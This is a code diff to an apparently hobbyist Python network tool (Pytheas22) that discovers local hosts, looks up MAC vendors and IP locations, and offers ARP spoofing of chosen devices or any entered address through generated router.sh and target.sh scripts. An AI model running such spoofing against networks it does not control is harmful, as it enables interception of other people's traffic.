@@ -150,19 +150,35 @@ class PortScanner:
 
     @classmethod
     def get_ip(cls):
-        open_ports = subprocess.run(["ip", "a"], capture_output=True)
-        everything = str(open_ports).split()
-        ipaddress = [everything[ip + 1] for ip, inet in enumerate(everything) if inet == "inet"]
+        print()
+        all_cmd = subprocess.run(["ip", "a"], capture_output=True).stdout.decode().split()
 
-        for each_ip in ipaddress:
-            real_ip = each_ip.split("/")
-            if real_ip[0] != "127.0.0.1":
-                cls.ip_subnett.append((real_ip[0], real_ip[1]))
+        all_ips = [cls.ip_subnett.append((all_cmd[idx + 1].split("/")[0], all_cmd[idx + 1].split("/")[1])) if
+                   all_cmd[idx + 1].split("/")[0] != "127.0.0.1" else "" for idx, ip in enumerate(all_cmd) if
+                   ip == "inet"][1:]
 
-        host = cls.ip_subnett[0][0].split(".")
+
+        for idx, each in enumerate(cls.ip_subnett):
+            just_ip = each[0].split(".")
+            just_ip[-1] = "0"
+            just_ip = ".".join(just_ip)
+            bp.color(f"[{idx + 1}]        {just_ip}", PortScanner.random_color)
+
+        get_chosen_ip = bp.color("Which Network do you want to scan?: ",
+                                 PortScanner.random_color, False)
+
+        get_ip = int(input(get_chosen_ip))
+
+        host = cls.ip_subnett[get_ip-1][0].split(".")
         host[-1] = "0"
         host_ip = ".".join(host)
-        return host_ip, cls.ip_subnett
+        if get_ip > len(all_ips) or get_ip < 0:
+            bp.color("This is not in the list")
+
+        else:
+            return host_ip, cls.ip_subnett[get_ip-1]
+
+
 
     def counter(self, country):
         res = requests.get(
@@ -246,19 +262,17 @@ class PortScanner:
 
     def manufacture(self, mac):
         data = requests.get(f"https://maclookup.app/search/result?mac={mac}")
-        split_data = data.text.split("\n")
+        split_data = data.text.split()
+
+        if 'content="Vendor/Company:' in split_data:
+            first_idx = split_data.index('content="Vendor/Company:')
+            second_idx = split_data.index('MAC')
+            mac_name = " ".join(split_data[first_idx + 1:second_idx]).strip(",")
 
-        if "No assignment is found for this MAC" not in data.text:
-            get_action = [every_action for every_action in split_data if
-                          '<div class="col-md-12" style="padding-bottom: 1em">' in every_action]
-            get_name = get_action[0].split("h2")
-            second = get_name[1]
-            this_name = second.split("<")
-            real_name = this_name[0].replace(">", "")
             if self.hostname is not None:
-                return f"{real_name} (hostname: {self.hostname})"
+                return f"{mac_name} (hostname: {self.hostname})"
             else:
-                return real_name
+                return mac_name
 
         else:
             if self.hostname is not None:
@@ -289,7 +303,9 @@ class PortScanner:
             print("THANK YOU FOR USING PYTHEAS22")
             os._exit(0)
 
-    def internal_windows(self):
+
+    def get_user_ip(self):
+        all_my_ips = []
         cmd = subprocess.run(["ipconfig", "/all"], capture_output=True)
         split_cmd = str(cmd).split()
 
@@ -298,17 +314,30 @@ class PortScanner:
         data = [every for every in split_cmd if "(" in every]
 
         all_ips = [each for each in get_all for every_data in data if each in every_data]
-
         valid_ip = []
         for every_ip in all_ips:
             try:
-                socket.inet_aton(every_ip)
-                if every_ip.split(".")[-1] not in ["1", "255"]:
-                    valid_ip.append(every_ip)
-            except socket.error:
+                ipaddress.ip_address(every_ip)
+                network_ip = ".".join(every_ip.split(".")[:3]) + ".0"
+                if every_ip.split(".")[-1] not in ["255"] and network_ip not in valid_ip:
+                    valid_ip.append(network_ip)
+                    all_my_ips.append(every_ip)
+            except:
                 continue
 
-        PortScanner.my_ip_address = valid_ip[-1]
+        for idx, each in enumerate(valid_ip):
+            bp.color(f"[{idx + 1}]        {each}", PortScanner.random_color)
+
+        get_chosen_ip = bp.color("Which Network do you want to scan?: ",
+                                 PortScanner.random_color, False)
+        get_ip = int(input(get_chosen_ip))
+        if get_ip > len(valid_ip):
+            bp.color("This is not in the list")
+        else:
+            return valid_ip[get_ip-1], all_my_ips
+
+    def internal_windows(self, user_ip):
+        PortScanner.my_ip_address = user_ip
         getlast = PortScanner.my_ip_address.split(".")
         spalten = [f"{'.'.join(getlast[0:3])}.{block_number}" for block_number in range(1, 255)]
         for all_ip in spalten:
@@ -322,13 +351,12 @@ class PortScanner:
         indexes = []
         for idx, arp_ip in enumerate(split_data):
             if f"{'.'.join(getlast[0:3])}" in arp_ip:
-                if arp_ip != PortScanner.my_ip_address:
-                    mac_ip = split_data[idx + 1]
-                    if mac_ip != "ff-ff-ff-ff-ff-ff":
-                        indexes.append((arp_ip, mac_ip))
+                mac_ip = split_data[idx + 1]
+                if mac_ip != "ff-ff-ff-ff-ff-ff":
+                    indexes.append((arp_ip, mac_ip))
 
         get_mac = PortScanner()
-        ip_name = [(ip, get_mac.get_name(ip, mac)) for ip, mac in indexes]
+        ip_name = [(ip, get_mac.get_name(ip, mac) if PortScanner.my_ip_address != ip else "MY IP-ADDRESS") for ip, mac in indexes]
         return ip_name
 
     @staticmethod
@@ -380,8 +408,8 @@ class PortScanner:
                 chosen_device = input(
                     bp.color("WHICH DEVICE DO YOU WANT TO RUN YOUR SPOOF ON?: ", PortScanner.random_color, False))
                 if chosen_device in devices:
-                    PortScanner.change_file("/home/potens/Pytheas22/router.sh", router, target, chosen_device)
-                    PortScanner.change_file("/home/potens/Pytheas22/target.sh", target, router, chosen_device)
+                    PortScanner.change_file("router.sh", router, target, chosen_device)
+                    PortScanner.change_file("target.sh", target, router, chosen_device)
                     bp.color("\n\nOPEN TWO TERMINALS\n"
                              "RUN 'bash router.sh' ON THE FIRST TERMINAL AND \n"
                              "RUN 'bash target.sh' ON THE SECOND TERMINAL\n"
@@ -404,64 +432,159 @@ class PortScanner:
             print("SORRY THIS ONLY WORKS ON LINUX. YOU CAN USE A VIRTUAL MACHINE TO RUN THIS")
             sys.exit()
         else:
-            self.linux_lst()
-            self.print_internal()
+            spoof_addr_question = bp.color("Do you want to spoof an own address or someone from your network? n (network) / o (own Address): ",
+                                   PortScanner.random_color, False)
+            spoof_addr = input(spoof_addr_question)
+            if spoof_addr == "o":
+                target_address_question = bp.color("Enter the target Address: ",
+                                      PortScanner.random_color, False)
+                target_address = input(target_address_question)
 
-            all_ips = [ip[0] for ip in PortScanner.every_ip_with_name]
-            router = self.get_router_ip()
-            while True:
-                try:
-                    str_this_ip = bp.color("Which ip do you want to arp spoof (just write the number of your ip)?: ",
-                                           PortScanner.random_color, False)
-                    self.ip = int(input(str_this_ip))
-                    if self.ip <= 0:
+                gateway_address_question = bp.color("Enter the router Address: ",
+                                      PortScanner.random_color, False)
+                gateway_address = input(gateway_address_question)
+
+                spoof = PortScanner()
+                spoof.__spoof_ip(gateway_address, target_address)
+            elif spoof_addr == "n":
+                self.linux_lst()
+                self.print_internal()
+
+                all_ips = [ip[0] for ip in PortScanner.every_ip_with_name]
+                router = self.get_router_ip()
+                while True:
+                    try:
+                        str_this_ip = bp.color("Which ip do you want to arp spoof (just write the number of your ip)?: ",
+                                               PortScanner.random_color, False)
+                        self.ip = int(input(str_this_ip))
+                        if self.ip <= 0:
+                            print("PLEASE WRITE A NUMBER THAT IS ABOVE YOU")
+                            continue
+                        else:
+                            self.ip = all_ips[self.ip - 1]
+
+                        if router:
+                            if self.ip != router:
+                                spoof = PortScanner()
+                                spoof.__spoof_ip(router, self.ip)
+                            else:
+                                print("YOU CANNOT SPOOF YOUR ROOTER")
+                                continue
+                        else:
+                            print("THE ROUTER COULD NOT BE FOUND. PLEASE TYPE IT MANUALLY")
+                            router_question = bp.color("\nRouter's IP: ", PortScanner.random_color, False)
+                            get_router = input(router_question)
+                            spoof = PortScanner()
+                            spoof.__spoof_ip(get_router, self.ip)
+
+                    except ValueError:
+                        print("PLEASE WRITE NUMBERS NOT STRINGS")
+                        continue
+
+                    except IndexError:
                         print("PLEASE WRITE A NUMBER THAT IS ABOVE YOU")
                         continue
-                    else:
-                        self.ip = all_ips[self.ip - 1]
 
-                    if router:
-                        if self.ip != router:
-                            spoof = PortScanner()
-                            spoof.__spoof_ip(router, self.ip)
-                        else:
-                            print("YOU CANNOT SPOOF YOUR ROOTER")
-                            continue
-                    else:
-                        print("THE ROUTER COULD NOT BE FOUND. PLEASE TYPE IT MANUALLY")
-                        router_question = bp.color("\nRouter's IP: ", PortScanner.random_color, False)
-                        get_router = input(router_question)
-                        spoof = PortScanner()
-                        spoof.__spoof_ip(get_router, self.ip)
+            else:
+                print("THIS IST NOT WHAT HAS BEEN ASKED!")
 
-                except ValueError:
-                    print("PLEASE WRITE NUMBERS NOT STRINGS")
-                    continue
 
-                except IndexError:
-                    print("PLEASE WRITE A NUMBER THAT IS ABOVE YOU")
-                    continue
-
-    @staticmethod
-    def linux_lst():
+    def linux_lst(self):
+        host_ip = PortScanner.get_ip()
         threading_wait = threading.Thread(target=PortScanner.wait)
         threading_wait.start()
-        host_ip = PortScanner.get_ip()
-        PortScanner.my_ip_address = host_ip[1][0][0]
-        all_data = subprocess.run(["netdiscover", "-r", f"{host_ip[0]}/{host_ip[1][0][1]}", "-P"], capture_output=True).stdout.decode()
+        PortScanner.my_ip_address = host_ip[1][0]
+        all_data = subprocess.run(["netdiscover", "-r", f"{host_ip[0]}/{host_ip[1][-1]}", "-P"], capture_output=True).stdout.decode()
+
         PortScanner.waiting = True
         time.sleep(0.6)
         PortScanner.waiting = False
-        order_ips = sorted([int(each.split()[0].split(".")[-1]) for each in all_data.split("\n") if re.findall(r"\d+.\d+.\d+.\d+", each)] + [int(str(PortScanner.my_ip_address).split(".")[-1])])
+        order_ips = sorted([int(each.split()[0].split(".")[-1]) for each in all_data.split("\n") if re.findall(r"\d+.\d+.\d+.\d+", each)])
 
         get_all_hostnames = {each.split()[0]: " ".join(each.split()[4:]) for each in all_data.split("\n") if
                              re.findall(r"\d+.\d+.\d+.\d+", each)}
 
-        get_all_hostnames[PortScanner.my_ip_address] = "MY IP-ADDRESS"
-        sorted_ips = [(ip, host) for each_number in order_ips for ip, host in get_all_hostnames.items() if
+        for each_ip in get_all_hostnames.keys():
+            getting_hostname = subprocess.run(["host", each_ip], capture_output=True).stdout.decode()
+            if getting_hostname.split()[-1] != "3(NXDOMAIN)":
+                self.hostnames[each_ip] = getting_hostname.split()[-1]
+
+        sorted_ips = [(ip, f"{host} (hostname: {self.hostnames[ip]})" if ip in self.hostnames else host) for each_number in order_ips for ip, host in get_all_hostnames.items() if
                       str(each_number) == ip.split(".")[-1]]
 
-        PortScanner.every_ip_with_name = sorted_ips
+        sorted_ips.insert(0, (PortScanner.my_ip_address, "MY IP-ADDRESS"))
+
+        return sorted_ips
+
+    def get_every_ip(self, operating_system="windows"):
+        if operating_system == "windows":
+            all_my_ips = []
+            cmd = subprocess.run(["ipconfig", "/all"], capture_output=True)
+            split_cmd = str(cmd).split()
+
+            klammer = r"\d+.\d+.\d+.\d+"
+            get_all = re.findall(klammer, str(cmd))
+            data = [every for every in split_cmd if "(" in every]
+
+            all_ips = [each for each in get_all for every_data in data if each in every_data]
+            valid_ip = []
+            for every_ip in all_ips:
+                try:
+                    ipaddress.ip_address(every_ip)
+                    network_ip = ".".join(every_ip.split(".")[:3]) + ".0"
+                    if every_ip.split(".")[-1] not in ["255"] and network_ip not in valid_ip:
+                        valid_ip.append(network_ip)
+                        all_my_ips.append(every_ip)
+
+                except Exception as e:
+                    continue
+
+            PortScanner.every_ip_with_name = []
+            for every_valid_ip in valid_ip:
+                user_ip = \
+                [each_ip for each_ip in all_my_ips if each_ip.split(".")[:3] == every_valid_ip.split(".")[:3]][0]
+
+                PortScanner.every_ip_with_name.extend(self.internal_windows(user_ip))
+
+            return PortScanner.every_ip_with_name
+
+        else:
+            all_cmd = subprocess.run(["ip", "a"], capture_output=True).stdout.decode().split()
+            valid_ips = []
+
+            every_ip = [valid_ips.append((all_cmd[idx + 1].split("/")[0], all_cmd[idx + 1].split("/")[1])) if
+                       all_cmd[idx + 1].split("/")[0] != "127.0.0.1" else "" for idx, ip in enumerate(all_cmd) if
+                       ip == "inet"][1:]
+
+            PortScanner.every_ip_with_name = []
+            for valid_ip in valid_ips:
+                if valid_ip[1] == "16":
+                    break
+                PortScanner.my_ip_address = valid_ip[0]
+                all_data = subprocess.run(["netdiscover", "-r", f"{valid_ip[0]}/{valid_ip[1]}", "-P"],
+                                          capture_output=True).stdout.decode()
+
+                order_ips = sorted([int(each.split()[0].split(".")[-1]) for each in all_data.split("\n") if
+                                    re.findall(r"\d+.\d+.\d+.\d+", each)])
+
+                get_all_hostnames = {each.split()[0]: " ".join(each.split()[4:]) for each in all_data.split("\n") if
+                                     re.findall(r"\d+.\d+.\d+.\d+", each)}
+
+                for each_ip in get_all_hostnames.keys():
+                    getting_hostname = subprocess.run(["host", each_ip], capture_output=True).stdout.decode()
+                    if getting_hostname.split()[-1] != "3(NXDOMAIN)":
+                        self.hostnames[each_ip] = getting_hostname.split()[-1]
+
+                sorted_ips = [(ip, f"{host} (hostname: {self.hostnames[ip]})" if ip in self.hostnames else host) for
+                              each_number
+                              in order_ips for ip, host in get_all_hostnames.items() if
+                              str(each_number) == ip.split(".")[-1]]
+
+                sorted_ips.insert(0, (PortScanner.my_ip_address, "MY IP-ADDRESS"))
+                PortScanner.every_ip_with_name.extend(sorted_ips)
+
+            return PortScanner.every_ip_with_name
+
 
     @staticmethod
     def print_internal():
@@ -479,7 +602,7 @@ class PortScanner:
 
                 iphone.settimeout(0.5)
                 iphone.connect((every_ip[0], 62078))
-                ip_name = "Apple Device"
+                ip_name = "Apple Device" if "(" not in every_ip[1] else f"Apple Device ({every_ip[1].split('(')[1]}"
             except:
                 pass
 
@@ -496,7 +619,6 @@ class PortScanner:
             just_ips.append(every_ip[0])
         return all_intern_ip, just_ips
 
-
     def scan_all_ip(self):
         start = time.perf_counter()
         for idx, every_port in enumerate(self.all_intern_ip):
@@ -535,13 +657,16 @@ class PortScanner:
         bp.color("ALL THE DEVICES IN YOUR NETWORK WILL BE SHOWN SOON", PortScanner.random_color)
         if sys.platform == "linux":
             get_lst = PortScanner()
-            get_lst.linux_lst()
+            PortScanner.every_ip_with_name = get_lst.linux_lst()
 
         elif sys.platform == "win32" or sys.platform == "windows" or sys.platform == "win64":
+            windows = PortScanner()
+            get_ip, my_ips = windows.get_user_ip()
+            user_ip = [each_ip for each_ip in my_ips if each_ip.split(".")[:3] == get_ip.split(".")[:3]][0]
+
             win_threading_wait = threading.Thread(target=PortScanner.wait)
             win_threading_wait.start()
-            windows = PortScanner()
-            PortScanner.every_ip_with_name = windows.internal_windows()
+            PortScanner.every_ip_with_name = windows.internal_windows(user_ip)
             time.sleep(0.5)
             PortScanner.waiting = True
             time.sleep(0.5)
@@ -682,14 +807,16 @@ class PortScanner:
         except OSError:
             pass
 
-    @staticmethod
-    def get_location_of_ip(ip):
-        if "." in ip or ":" in ip:
-            if "." in ip: url = f"https://www.geolocation.com/de?ip={ip}#ipresult"
+    def get_location_of_ip(self, ip):
+        self.ip = ip
+
+        if "." in self.ip or ":" in self.ip:
+            if "." in self.ip: url = f"https://www.geolocation.com/de?ip={self.ip}#ipresult"
             else:
-                new_url = '%20'.join(ip.split(":"))
+                new_url = '%20'.join(self.ip.split(":"))
                 url = f"https://www.geolocation.com/de?ip={new_url}#ipresult"
-            if len(ip.split(".")) == 4 or len(ip.split(":")) > 5:
+
+            if len(self.ip.split(".")) == 4 or len(self.ip.split(":")) > 5:
                 print("\nGetting the potential location of the address")
                 data = requests.get(url).text.replace(r"\\t", "").replace(r"\\r", "").split()
 
@@ -738,6 +865,9 @@ class PortScanner:
             PortScanner.is_web = True
 
         else:
+            if "-" in this_ip:
+                this_ip = ':'.join(this_ip.split("-"))
+
             if ":" in this_ip:
                 split_ipv6 = this_ip.split(":")
                 if len(split_ipv6) > 5:
@@ -753,7 +883,7 @@ class PortScanner:
                                  PortScanner.random_color)
                         quit()
         if not PortScanner.is_web and not PortScanner.ipv6:
-            if this_ip.split(".")[0] not in ["10", "127", "172", "192"]:
+            if f"{this_ip.split('.')[0]}.{this_ip.split('.')[1]}" not in ["10.0", "172.17", "192.168", "127.0"]:
                 PortScanner.public_ip = True
 
         if "http" in original:
@@ -931,7 +1061,6 @@ class PortScanner:
                 bp.color(string_port, PortScanner.random_color)
                 bp.color("\nThis program must be run in root!!!!\n".upper(), "red")
                 quit()
-
         bp.color(string_port, PortScanner.random_color)
         check_website = 0
 
